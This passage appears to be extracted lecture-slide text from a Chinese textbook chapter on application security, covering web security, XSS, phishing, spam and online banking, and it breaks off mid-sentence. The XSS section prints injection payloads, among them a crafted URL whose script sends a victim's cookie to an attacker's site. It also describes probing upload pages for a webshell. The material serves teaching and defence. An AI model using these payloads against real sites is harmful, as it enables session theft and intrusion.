第7章应用安全技术

第7章应用安全技术主要内容7.1Web应用安全技术7.2电子商务安全7.3电子邮件加密技术7.4防垃圾邮件技术7.5网络防钓鱼技术7.6QQ安全使用7.7网上银行账户安全7.8使用WinHex7.1Web应用安全技术Web技术简介与安全分析应用安全基础实例--xss跨站攻击技术2023/2/13Web技术简介与安全分析Web服务器也称为WWW服务器，主要功能是提供网上信息浏览服务。UNIX/Linux系统中的Web服务器多采用Apache服务器软件；Windows系统中的Web服务器多采用IIS服务器软件。Web浏览器Web浏览器用于向服务器发送资源索取请求，并将接收到的信息进行解码和显示。常见的Web浏览器软件有Firefox、IE、Chrome等。通信协议Web浏览器与服务器之间遵循HTTP协议进行通讯传输。2023/2/14HTML和JavaScript语言HTML是一种用来制作网页的标记语言，它不需要编译，可以直接由浏览器执行，属于浏览器解释型语言。JavaScript是一种基于对象和事件驱动并具有相对安全性的客户端脚本语言。同时也是一种广泛用于客户端Web开发的脚本语言，常用来给HTML网页添加动态功能，比如响应用户的各种操作。练习P268Web技术简介与安全分析Web技术简介与安全分析Webshell“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户（入侵者）通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。上传漏洞在浏览器地址栏中网址的后面加上“/upfile.asp”（或与此含义相近的名字），如果显示“上传格式不正确”等类似的提示，说明存在上传漏洞，可以用上传工具得到WebShell。暴库暴库就是通过猜测数据库文件所在的路径来将其下载，得到该文件后就可以破解该网站的用户密码了。旁注利用同一主机上面不同网站的漏洞得到webshell，从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。Web技术简介与安全分析CGI通用网关接口，它是一段程序，运行在服务器上，提供同客户端HTML页面的接口，通俗的讲CGI就像是一座桥，把网页和WEB服务器中的执行程序连接起来，它把HTML接收的指令传递给服务器，再把服务器执行的结果返还给HTML页；用CGI可以实现处理表格，数据库查询，发送电子邮件等许多操作。CGI使网页变得不是静态的，而是交互式的。CGI可以用任何一种语言编写，只要这种语言具有标准输入、输出和环境变量。

Web技术简介与安全分析Web系统架构用户使用Web浏览器，通过网络连接到Web服务器。用户发出请求，服务器根据请求的URL，找到对应的网页文件，发送给用户。网页文件是HTML/XML格式的文本文件，Web浏览器有一个解释器，将网页文本转换成Web浏览器中看到的网页。

Web技术简介与安全分析静态网页:网页内容不会发生变化，除非网页设计者修改了网页的内容。不能实现和浏览网页的用户之间的交互。信息流向是单向的，即从服务器到浏览器。服务器不能根据用户的选择调整返回给用户的内容。Web技术简介与安全分析动态网页：能与后台数据库进行交互，数据传递。也就是说，网页URL的后缀不是.htm、.html、.shtml、.xml等静态网页的常见形动态网页制作格式，而是以..asp、.jsp、.php、.perl、.cgi等形式为后缀，并且在动态网页网址中有一个标志性的符号——“?”。动态网页一般以数据库技术为基础，可以大大降低网站维护的工作量采用动态网页技术的网站可以实现更多的功能，如用户注册、用户登录、在线调查、用户管理、订单管理等等动态网页实际上并不是独立存在于服务器上的网页文件，只有当用户请求时服务器才返回一个完整的网页Web技术简介与安全分析Web系统架构安全分析服务器系统漏洞Web服务应用漏洞密码暴力破解Web技术简介与安全分析应用安全基础网页防篡改系统网页内容过滤技术实时信息过滤广告软件（adware）间谍软件（spyware）浏览器劫持恶意共享软件2023/2/113使用安全性比较高的浏览器,不要浏览不良网站,不要轻易安装共享软件、盗版软件或免费软件。xss跨站攻击技术XSS又称CSS（CrossSiteScript），即跨站脚本攻击，它指的是恶意攻击者向Web页面里插入恶意代码，当用户浏览该页时，嵌入Web里面的恶意代码会被执行，从而达到攻击者的特殊目的。比如获取用户的Cookie，导航到恶意网站，携带木马等。XSS属于被动式的攻击。2023/2/114用户提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中，一个恶意用户提交的Html代码被其它浏览该网站的用户访问，通过这些Html代码也就间接控制了浏览者的浏览器，就可以做很多的事情，如：窃取敏感信息、引导访问者的浏览器去访问恶意网站等。Xss跨站脚本攻击原理一类是来自内部的攻击，主要指的是利用程序自身的漏洞，构造跨站语句。另一类则是来自外部的攻击，主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点，我们自己构造一个有跨站漏洞的网页，然后构造跨站语句，通过结合其它技术，如社会工程学等，欺骗目标服务器的管理员打开。XSS的种类XSS是如何发生的呢假如有下面一个textbox<inputtype="text"name="address1"value="value1from">value1from是来自用户的输入，如果用户不是输入value1from,而是输入“><script>alert(document.cookie)</script><!-那么就会变成<inputtype="text"name="address1"value=""><script>alert(document.cookie)</script><!-">事件被触发的时候嵌入的JavaScript代码将会被执行，

攻击的威力，取决于用户输入了什么样的脚本。XSS之所以会发生，是因为用户输入的数据变成了代码。所以我们需要对用户输入的数据进行HTMLEncode处理。将其中的"中括号"，“单引号”，“引号”之类的特殊字符进行编码。XSS攻击举例Tom发现了V中的一个页面有XSS漏洞，例如:/search.asp?term=apple服务器中Search.asp页面的代码大概如下：

<html>

<title></title>

<body>

Resultsfor<%Request.QueryString("term")%>

...

</body>

</html>Tom先建立一个网站,

用来接收“偷”来的信息。

然后Tom构造一个恶意的url(如下),通过某种方式(邮件，QQ)发给Monica /search.asp?term=<script>window.open("?cookie="+document.cookie)</script>Monica点击了这个URL，嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行.那么Monica在网站的cookie,就会被发送到badguy网站中。这样Monica在

的信息就被Tom盗了XSS攻击举例7.2电子商务安全广义的电子商务定义为，使用各种电子工具从事商务活动；狭义电子商务定义为，主要利用Internet从事商务或活动。电子商务涵盖了两个方面离不开互联网这个平台，没有了网络，就称不上为电子商务通过互联网完成的是一种商务活动

电子商务的安全控制要求安全交易标准目前安全电子交易的手段2023/2/1207.3电子邮件加密技术pgp2023/2/1217.4防垃圾邮件技术什么是垃圾邮件垃圾邮件的危害性避免垃圾邮件的几种方法实例：垃圾邮件的处理2023/2/1227.5网络防钓鱼技术什么是网络钓鱼通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感信息（如用户名、口令、帐号ID、ATM或信用卡详细信息）的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上，并获取收信人在此网站上输入的个人敏感信息，通常这个攻击过程不会让受害者警觉。防备网络钓鱼的一般常识Windows用户对网络钓鱼的防范Linux用户对网络钓鱼的防范2023/2/1237.6qq安全使用密码安全设置密码保护2023/2/1247.7网上银行账户安全什么是网上银行网上银行的发展网上银行安全隐患和可